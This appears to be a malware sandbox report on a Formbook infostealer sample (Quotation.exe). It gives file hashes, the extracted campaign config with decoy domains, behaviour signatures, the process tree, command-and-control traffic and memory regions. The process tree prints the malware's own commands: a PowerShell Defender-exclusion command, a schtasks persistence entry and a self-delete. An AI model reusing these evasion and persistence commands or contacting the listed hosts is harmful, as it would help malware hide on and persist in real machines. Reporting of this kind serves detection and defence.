Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    03/05/2023, 10:19 UTC

General

  • Target

    Quotation.exe

  • Size

    704KB

  • MD5

    64d571f6ab61788ccd1d0e7e83f85e1e

  • SHA1

    65c6d2dc29a74b4ae79594c2a0517c41a0798f9c

  • SHA256

    b81deeedf20176eab269dc52fb165d8d8c7f74fe3bddf09089702b37dd012ce6

  • SHA512

    29f813bf6539d76e68955f93ab96b2a8b3174118f05be8a9ec4432e9761ac7694863146e29247cfedd243414fdebd07ebbdb3537e5a729f985bc6ba3686e89a1

  • SSDEEP

    12288:MPFQH49xB8v6CJvt7pxtQdqqEoL9zH95wo3BE:CFQY9EtxtQdBEoL9zb3O

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

ce18

Decoy

kenfinnegan.com

exopestireland.com

allthingzbeautiellc.com

attractiveidiot.com

calmsealight.com

ectobyte.com

8rr.xyz

hcmajq.info

alisongraceventures.com

jamtanganbagus.online

forexpropfirmmastery.com

coupimmobilier.com

amarisetechnologies.com

countrykidsclothing.com

eyecatcher.tech

merxip.online

fiteallc.com

themensroombarber.co.uk

seroofingtelford.co.uk

birdie786.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 6 IoCs
  • Deletes itself 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Users\Admin\AppData\Local\Temp\Quotation.exe
      "C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1380
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wKVmDzRBwGW.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:668
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wKVmDzRBwGW" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBD86.tmp"
        3⤵
        • Creates scheduled task(s)
        PID:808
      • C:\Users\Admin\AppData\Local\Temp\Quotation.exe
        "C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
        3⤵
          PID:944
        • C:\Users\Admin\AppData\Local\Temp\Quotation.exe
          "C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:1492
      • C:\Windows\SysWOW64\NAPSTAT.EXE
        "C:\Windows\SysWOW64\NAPSTAT.EXE"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1604
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
          3⤵
          • Deletes itself
          PID:1972

    Network

    • flag-us
      DNS
      www.forexpropfirmmastery.com
      Explorer.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.forexpropfirmmastery.com
      IN A
      Response
    • flag-us
      DNS
      www.amarisetechnologies.com
      Explorer.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.amarisetechnologies.com
      IN A
      Response
      www.amarisetechnologies.com
      IN CNAME
      amarisetechnologies.com
      amarisetechnologies.com
      IN A
      103.213.238.82
    • flag-bd
      GET
      http://www.amarisetechnologies.com/ce18/?AN=6a3I8bcj/M0caEP40phs2xumxfzjwqT9vaQ5ZYtWSl91lHGtFFE2LeT7tLv95yfk&2ds=izrLUxfxB4ht7
      Explorer.EXE
      Remote address:
      103.213.238.82:80
      Request
      GET /ce18/?AN=6a3I8bcj/M0caEP40phs2xumxfzjwqT9vaQ5ZYtWSl91lHGtFFE2LeT7tLv95yfk&2ds=izrLUxfxB4ht7 HTTP/1.1
      Host: www.amarisetechnologies.com
      Connection: close
      Response
      HTTP/1.1 302 Found
      content-type: text/html
      content-length: 706
      date: Wed, 03 May 2023 10:21:06 GMT
      server: LiteSpeed
      location: 404.html
      connection: close
    • 103.213.238.82:80
      http://www.amarisetechnologies.com/ce18/?AN=6a3I8bcj/M0caEP40phs2xumxfzjwqT9vaQ5ZYtWSl91lHGtFFE2LeT7tLv95yfk&2ds=izrLUxfxB4ht7
      http
      Explorer.EXE
      354 B
      1.1kB
      4
      5

      HTTP Request

      GET http://www.amarisetechnologies.com/ce18/?AN=6a3I8bcj/M0caEP40phs2xumxfzjwqT9vaQ5ZYtWSl91lHGtFFE2LeT7tLv95yfk&2ds=izrLUxfxB4ht7

      HTTP Response

      302
    • 8.8.8.8:53
      www.forexpropfirmmastery.com
      dns
      Explorer.EXE
      74 B
      147 B
      1
      1

      DNS Request

      www.forexpropfirmmastery.com

    • 8.8.8.8:53
      www.amarisetechnologies.com
      dns
      Explorer.EXE
      73 B
      103 B
      1
      1

      DNS Request

      www.amarisetechnologies.com

      DNS Response

      103.213.238.82

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmpBD86.tmp

      Filesize

      1KB

      MD5

      753d4588c59af7a42f5d1949602c6598

      SHA1

      677bc5fe37077696fd51342412f9a693d634a9bf

      SHA256

      258a79e97a9501dec12880e6a9ed3d6d96129fd7a6384c12ee4ea61854bc90b8

      SHA512

      7ec680cbe0130f2531ab6949e671f99244c427cb0a72e6496402a88e293eb77374d41d7109254fd00ab1495e5b68d3117bdf8144c2cfcde3940e618170760a52

    • memory/668-74-0x00000000025E0000-0x0000000002620000-memory.dmp

      Filesize

      256KB

    • memory/668-73-0x00000000025E0000-0x0000000002620000-memory.dmp

      Filesize

      256KB

    • memory/1264-96-0x00000000061C0000-0x00000000062CC000-memory.dmp

      Filesize

      1.0MB

    • memory/1264-78-0x0000000006B90000-0x0000000006D16000-memory.dmp

      Filesize

      1.5MB

    • memory/1264-93-0x00000000061C0000-0x00000000062CC000-memory.dmp

      Filesize

      1.0MB

    • memory/1264-92-0x00000000061C0000-0x00000000062CC000-memory.dmp

      Filesize

      1.0MB

    • memory/1264-82-0x0000000007410000-0x000000000758E000-memory.dmp

      Filesize

      1.5MB

    • memory/1264-80-0x00000000037A0000-0x00000000038A0000-memory.dmp

      Filesize

      1024KB

    • memory/1380-58-0x0000000000520000-0x000000000052C000-memory.dmp

      Filesize

      48KB

    • memory/1380-59-0x0000000005A30000-0x0000000005AAE000-memory.dmp

      Filesize

      504KB

    • memory/1380-57-0x0000000004E70000-0x0000000004EB0000-memory.dmp

      Filesize

      256KB

    • memory/1380-67-0x0000000004840000-0x0000000004886000-memory.dmp

      Filesize

      280KB

    • memory/1380-56-0x0000000000410000-0x0000000000420000-memory.dmp

      Filesize

      64KB

    • memory/1380-55-0x0000000004E70000-0x0000000004EB0000-memory.dmp

      Filesize

      256KB

    • memory/1380-54-0x0000000000A10000-0x0000000000AC6000-memory.dmp

      Filesize

      728KB

    • memory/1492-75-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-71-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-76-0x0000000000AD0000-0x0000000000DD3000-memory.dmp

      Filesize

      3.0MB

    • memory/1492-81-0x00000000001E0000-0x00000000001F5000-memory.dmp

      Filesize

      84KB

    • memory/1492-69-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-84-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-68-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    • memory/1492-77-0x0000000000140000-0x0000000000155000-memory.dmp

      Filesize

      84KB

    • memory/1492-70-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/1604-83-0x0000000000610000-0x0000000000656000-memory.dmp

      Filesize

      280KB

    • memory/1604-88-0x0000000000080000-0x00000000000AF000-memory.dmp

      Filesize

      188KB

    • memory/1604-90-0x0000000001E10000-0x0000000001EA4000-memory.dmp

      Filesize

      592KB

    • memory/1604-87-0x0000000001EC0000-0x00000000021C3000-memory.dmp

      Filesize

      3.0MB

    • memory/1604-86-0x0000000000080000-0x00000000000AF000-memory.dmp

      Filesize

      188KB

    • memory/1604-85-0x0000000000610000-0x0000000000656000-memory.dmp

      Filesize

      280KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.